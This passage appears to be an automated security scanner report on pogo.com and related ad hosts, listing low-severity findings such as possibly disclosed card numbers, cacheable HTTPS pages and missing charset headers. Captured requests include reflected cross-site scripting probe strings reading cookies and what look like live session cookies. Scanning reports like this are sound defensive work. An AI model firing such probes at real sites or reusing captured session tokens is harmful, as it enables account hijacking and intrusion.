22. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize-winners.do

Issue detail

The following credit card numbers were disclosed in the response:

4455418439464542
4524299505279486
5105048343648475

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /prize/prize-winners.do HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:03:58 GMT
Server: Apache-Coyote/1.1
Content-Length: 195963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
25 548 28 33 555 348 36 259 20 352 350 385 349 37 22 353 351 354 8 553 388 19 35 38 558 357 359 356 557 34 32 556 565 187 255 31 386 0 566 358 564 41 355 560 384 561 258 389 563 40 562 546 383 43 559 44 554 184 39 46 45 42 50 390 394 48 53 10 11 193 52 51 395 428 391 49 423 429 431 430 432 424 194 569 244 251 570 191 246 567 393 249 425 12 195 392 568 248 245 252 192 250 247 427 572 571 196 426 </div>
...[SNIP]...
8 247 350 289 522 72 123 262 180 163 174 394 353 106 414 533 280 145 95 80 34 326 352 552 172 474 453 70 310 230 78 437 506 447 566 354 183 116 555 443 209 98 481 56 330 196 365 290 494 441 383 152 36 452 4 299 505 279 486 248 274 74 63 331 413 491 217 227 182 529 171 361 126 466 66 340 449 537 234 329 31 154 213 81 308 546 101 457 357 411 333 38 316 313 483 157 194 258 1 135 351 235 188 426 450 192 346 91 269 328 560 1
...[SNIP]...
185 558 202 32 55 212 312 493 28 142 408 363 539 11 306 541 367 137 128 39 110 52 187 271 360 347 455 13 164 497 400 266 111 270 40 103 468 256 317 403 114 253 85 71 61 459 166 199 362 208 141 86 382 510 504 83 436 48 475 520 219 454 341 556 292 178 12 322 285 22 514 389 427 364 37 515 377 105 444 320 487 113 35 283 231 345 402 204 314 62 325 252 30 121 304 79 51 446 557 0 386 59 401 49 45 15 368 10 </div>
...[SNIP]...

23. Cacheable HTTPS response previous next
There are 8 instances of this issue:

/action/pogo/signin.do
/action/pogop/heavyregview.do
/fbconnect/getstatus.do
/legal/us/gems-prem-album-ts.html
/surveys/peanutlabsprocesssubs.do
/surveys/processZipSubs.do
/surveys/surveysofferssubs.do
/v/DV37sw/include/css/pogo.css

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

23.1. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Request

Response

23.2. https://www.pogo.com/action/pogop/heavyregview.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogop/heavyregview.do

Request

Response

23.3. https://www.pogo.com/fbconnect/getstatus.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/fbconnect/getstatus.do

Request

GET /fbconnect/getstatus.do HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; s_pers=%20s_nr%3D1294537642371-New%7C1297129642371%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/json;charset=UTF-8
Date: Sun, 09 Jan 2011 01:47:14 GMT
Server: Apache-Coyote/1.1
Content-Length: 123

({"isPogoUserLinked":false,"hasFbSession":false,"isFbUserLinked":false,"currentFbUid":0,"connected":false,"newLink":false})

23.4. https://www.pogo.com/legal/us/gems-prem-album-ts.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/legal/us/gems-prem-album-ts.html

Request

GET /legal/us/gems-prem-album-ts.html HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
ETag: W/"40757-1253814020000"
Last-Modified: Thu, 24 Sep 2009 17:40:20 GMT
Content-Type: text/html
Content-Length: 40757
Date: Sun, 09 Jan 2011 02:57:48 GMT
Server: Apache-Coyote/1.1

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omm
...[SNIP]...

23.5. https://www.pogo.com/surveys/peanutlabsprocesssubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/peanutlabsprocesssubs.do

Request

GET /surveys/peanutlabsprocesssubs.do?userId=998826224 HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/surveys/surveysofferssubs.do
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536624994-New%7C1297128624994%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

23.6. https://www.pogo.com/surveys/processZipSubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/processZipSubs.do

Request

Response

23.7. https://www.pogo.com/surveys/surveysofferssubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/surveysofferssubs.do

Request

Response

23.8. https://www.pogo.com/v/DV37sw/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/v/DV37sw/include/css/pogo.css

Request

GET /v/DV37sw/include/css/pogo.css HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/surveys/surveysofferssubs.do?emv=SOsub_test_heavy_2
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536588216-New%7C1297128588216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 134493
Date: Fri, 07 Jan 2011 13:24:33 GMT
Expires: Wed, 06 Jan 2016 13:24:33 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4560-1170991451000"
Last-Modified: Fri, 09 Feb 2007 03:24:11 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 4560

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

24. HTML does not specify charset previous next
There are 39 instances of this issue:

http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2
http://ad.doubleclick.net/adi/N3285.weather/B2343920.105
http://ad.doubleclick.net/adi/N3285.weather/B2343920.98
http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144
http://altfarm.mediaplex.com/ad/js/55290
http://assets.rubiconproject.com/static/rtb/sync-min.html
http://blog.pandora.com/
http://blog.pandora.com/pandora/archives/images/map.html
http://blog.pandora.com/pandora/assets_c/2010/11/North
http://blog.pandora.com/pandora/assets_c/2010/11/sd
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://download-games.pogo.com/Category.aspx
http://download-games.pogo.com/deluxe.aspx
http://download-games.pogo.com/game.htm
http://game3.pogo.com/blank.html
http://game3.pogo.com/room/util/silentclosepage.html
http://game3.pogo.com/v/11.1.9.13/applet/scrabble/
http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js
http://www.e00.peanutlabs.com/js/iFrame/sc.php
http://www.e00.peanutlabs.com/recvMid.php
http://www.intellicast.com/Travel/CheapFlightsWidget.htm
http://www.pandora.com/facebook/xd_receiver.htm
http://www.pandora.com/include/backstageAdEmbed.html
http://www.pandora.com/include/communityAdEmbed.html
http://www.peanutlabs.com/generateUserId.php
http://www.peanutlabs.com/js/iFrame/sc.php
http://www.peanutlabs.com/recvMid.php
http://www.peanutlabs.com/sampleIframe.php
https://www.pogo.com/v/FEoeug/reg/stylesheets/flow_1/imagesreg%0Flow_1ot.png
http://www.thedailynews.cc/
http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg
http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

24.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.Centro/B5116224.2

Request

Response

24.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.weather/B2343920.105

Request

Response

24.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.weather/B2343920.98

Request

Response

24.4. http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5621.148484.0233710364621/B4682144

Request

Response

24.5. http://altfarm.mediaplex.com/ad/js/55290 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/55290

Request

GET /ad/js/55290 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: svid=517004695355;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 204
Date: Sun, 09 Jan 2011 02:03:35 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/7440-39748-1543-3"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/7440/MT_300x250_19024_FirstJobChrisRock.gif" ></a
...[SNIP]...

24.6. http://assets.rubiconproject.com/static/rtb/sync-min.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.rubiconproject.com
Path:	/static/rtb/sync-min.html

Request

GET /static/rtb/sync-min.html HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; rdk15=0; ses15=4762^1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 07 Jan 2011 01:31:17 GMT
ETag: "24400b-bbf-4993793194340"
Accept-Ranges: bytes
_onnection: close
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:02:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 3007

<html><head><title></title></head><body><script language="javascript">function setCookie(name,value,days){var expires;if(days){var date=new Date();date.setTime
...[SNIP]...

24.7. http://blog.pandora.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/

Request

GET / HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/?ext_reg=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:43 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Mon, 19 Jul 2010 00:31:56 GMT
ETag: "79c41e-79-48bb2b2243700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 121

<HTML>
<HEAD>
<TITLE>Redirecting..</TITLE>
<meta http-equiv="Refresh" content="1; URL=./pandora/">
</HEAD>
</HTML>

24.8. http://blog.pandora.com/pandora/archives/images/map.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/images/map.html

Request

GET /pandora/archives/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:46 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Thu, 13 Dec 2007 16:23:43 GMT
ETag: "7cc36e-bc-4412d5e9501c0"
Accept-Ranges: bytes
Content-Length: 188
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html>
<body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">

<img src="http://blog.pandora.com/pandora/archives/images/map.gif" width="948" height="579" />

</body>
</html>

24.9. http://blog.pandora.com/pandora/assets_c/2010/11/North previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Request

GET /pandora/assets_c/2010/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 313

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/North was not found on thi
...[SNIP]...

24.10. http://blog.pandora.com/pandora/assets_c/2010/11/sd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Request

GET /pandora/assets_c/2010/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 310

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/sd was not found on this s
...[SNIP]...

24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 01:34:09 GMT
Connection: close
Content-Length: 1864

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

24.12. http://download-games.pogo.com/Category.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Request

GET /Category.aspx?code=110051313&genre=Pogo Originals&RefID=headernav_fp_shopmenu&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 20
Expires: Sun, 09 Jan 2011 02:09:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 09 Jan 2011 02:09:21 GMT
Connection: close

<h1>Bad Request</h1>

24.13. http://download-games.pogo.com/deluxe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Request

GET /deluxe.aspx?code=118017277&genre=Hidden Object&RefID=headernav_fp_shopmenu&Session=&origin=HPTemplateGameList&ln=en HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
